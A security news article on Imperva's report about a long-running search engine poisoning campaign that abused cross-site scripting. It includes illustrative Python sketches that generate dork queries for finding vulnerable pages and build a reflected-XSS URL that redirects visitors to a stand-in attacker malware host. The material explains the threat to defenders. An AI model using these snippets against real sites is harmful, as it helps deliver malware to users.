Search engine poisoning methodologies revealed

The paper - Imperva's second HII (Hacker Intelligence Initiative) report - is the result of an analysis of a 15-month SEP campaign which the firm describes as highly successful, with no apparent counter-measures having been deployed by search engines.

This, says the firm, illustrates how websites - often without their administrators' knowledge - and web search engines become the conduits for these types of attack, and demonstrates that more needs to be done to stop these malware campaigns.

According to the report, SEP attacks manipulate search engines to display search results that contain references to malware-delivering websites.

"There are a multitude of methods to perform SEP, including taking control of popular websites, using the search engines' sponsored links to reference malicious sites and injecting HTML code", says the analysis

One of the most popular SEP methodologies involves sites that are vulnerable to cross-site scripting (XSS) attacks, which attackers locate using advanced scripted Google searches.
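The report does not publish the attackers' actual queries, but the kind of scripted search it describes can be sketched as follows. The query templates and parameter names below are hypothetical examples of "Google dorks" that look for pages which echo a URL parameter back - a common sign of reflected XSS:

```python
# Illustrative sketch only: hypothetical "dork" templates for finding
# pages that take user input in the URL, the first step the report
# attributes to XSS-based SEP campaigns.
DORK_TEMPLATES = [
    'inurl:"{param}=" site:{domain}',   # pages taking the parameter in the URL
    'inurl:"search.php?{param}="',      # a common searchable-script pattern
]

COMMON_PARAMS = ["q", "query", "keyword"]


def build_dorks(domain: str) -> list[str]:
    """Expand the templates into concrete search queries for one domain."""
    dorks = []
    for template in DORK_TEMPLATES:
        for param in COMMON_PARAMS:
            dorks.append(template.format(param=param, domain=domain))
    return dorks


if __name__ == "__main__":
    for dork in build_dorks("example.com"):
        print(dork)
```

Running such queries in bulk is what makes the reconnaissance "scripted": the attacker harvests candidate vulnerable pages at scale rather than finding them by hand.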

Then, by attacking the site in question and infecting its pages with malware - or, more routinely, installing redirects to other infected pages - the hackers effectively create a set of web pages, baited with attractive content, that can be manipulated to rank highly in search engines and act as a trap for internet users.
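In the reflected-XSS variant, the attacker may not need to modify the site at all: the "infected page" is simply a crafted URL whose echoed parameter injects attacker-controlled markup. A minimal sketch, with hypothetical site names and parameter, might look like this:

```python
from urllib.parse import urlencode

# Illustrative sketch (details are hypothetical, not taken from the report):
# a crafted URL against a page that reflects its "q" parameter unescaped.
# Anyone who follows the link - including a search engine crawler that
# indexes it - is handed markup pointing at the attacker's server.


def poisoned_url(vulnerable_page: str, param: str, attacker_site: str) -> str:
    # HTML payload that the vulnerable page echoes back verbatim;
    # here a meta-refresh that bounces the visitor to the attacker's site.
    payload = f'<meta http-equiv="refresh" content="0;url={attacker_site}">'
    return vulnerable_page + "?" + urlencode({param: payload})


url = poisoned_url("https://trusted.example/search", "q",
                   "https://attacker.example/malware")
print(url)
```

The point of the technique is that the trusted site's domain is what the search engine sees and ranks, while the payload rides along in the query string.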

Because the attackers target sites that search engines already recommend for given topics, Imperva claims, the infected pages are effectively missed by web browser add-ins that look for malicious pages.

According to Amichai Shulman, Imperva's CTO, his research team were able to detect and track a SEP attack campaign from start to finish.

"The prevalence and longevity of this attack indicates not only how long it lasted undetected, but also that companies are not aware they are being used as a conduit of an attack", he said.

"It also highlights that search engines should do more to improve their ability to accurately identify potentially harmful sites and warn users about them", he added.

Shulman is also advising search engine providers that current solutions for warning users of malicious sites lack the required accuracy and precision, as many malicious sites continue to be returned unflagged by the relevant security software.

"However, these solutions can be enhanced by studying the footprints of a SEP via XSS. This allows a more accurate, and timely notification, as well as prudent indexing", he explained.